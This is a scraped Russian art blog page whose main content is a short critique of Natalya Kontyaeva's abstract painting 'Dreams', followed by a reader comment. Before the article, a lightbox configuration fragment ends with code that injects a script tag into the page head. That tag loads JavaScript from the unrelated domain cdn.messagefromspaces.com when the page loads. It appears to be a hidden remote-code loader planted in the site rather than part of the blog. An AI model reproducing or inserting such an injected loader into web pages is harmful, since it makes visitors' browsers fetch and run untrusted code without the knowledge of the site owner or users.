, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картина Сны

Автор: Наталья Юрова | 21 Июн 2012

картина «Сны»  Натальи КонтяевойОчень интересной по стилю написания является картина «Сны». Автор ее – Наталья Контяева, художник декоративной абстрактной живописи.

Интересна картина тем, что полностью раскрывает  свое название. Что такое сон в нашем понимании? Вереница образов, картинок, слайдов, вызывающих те или иные чувства и объединяющихся в «одну историю». Присмотритесь, и вы увидите на картине слайды из наших снов. Разноцветные квадраты, окутывающие и затягивающие  маску в водоворот  нереальных событий. Обратите также внимание, что картина совершенно не имеет зеленый цвет и его оттенки. Зеленый цвет – цвет жизни. Вся растительность (деревья, травы)  - зеленые и…. живые! А сон – лишь иллюзия жизни. Он может быть насыщенным и возбуждающим агрессивные или страстные чувства (красным) или угрожающим, вызывающим страх (черным). Сны бывают и поверхностными, незапоминающимися (серыми, бледными) или наоборот спокойными и теплыми (желтыми) или быть откровениями,  символом воды – источника жизни (синими)… Но вот зелеными они не бывают, так как не несут в себе жизни и остаются навсегда  миражами…

Маска, изображенная между разноцветными квадратами, не выражает никаких эмоций. Ее лик спокоен: ни глаза, ни губы не показывают нам никаких чувств.  Мы видим  полное погружение в сон, в нереальный мир образов.

Картина Сны выполнена акрилом на холсте. Она спокойна и ненавязчива в своих образах. Рассказывает нам не только о снах, но и о вечности, которая также безмятежна, загадочна и является волшебно-мистической.

Простая картина, вызывающая многообразие ассоциаций и череду  мыслей о жизни, которая одновременно и реальна, и нереальна, как сон. Во сне для нас все -  настоящее и живое,  но, просыпаясь, мы понимаем, что действительность - здесь. И кто знает, может правы окажутся многие религии,  утверждающие, что: «Наша жизнь станет для нас когда-нибудь сном,  когда мы проснемся в вечности…»

Темы: Критика | 1 отзыв »

Один отзыв на “Картина Сны”

  1. Олеся пишет:
    20 Мар 2015 в 10:04

    Все просто, но притягивает. Позаимствую в качестве аватара.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress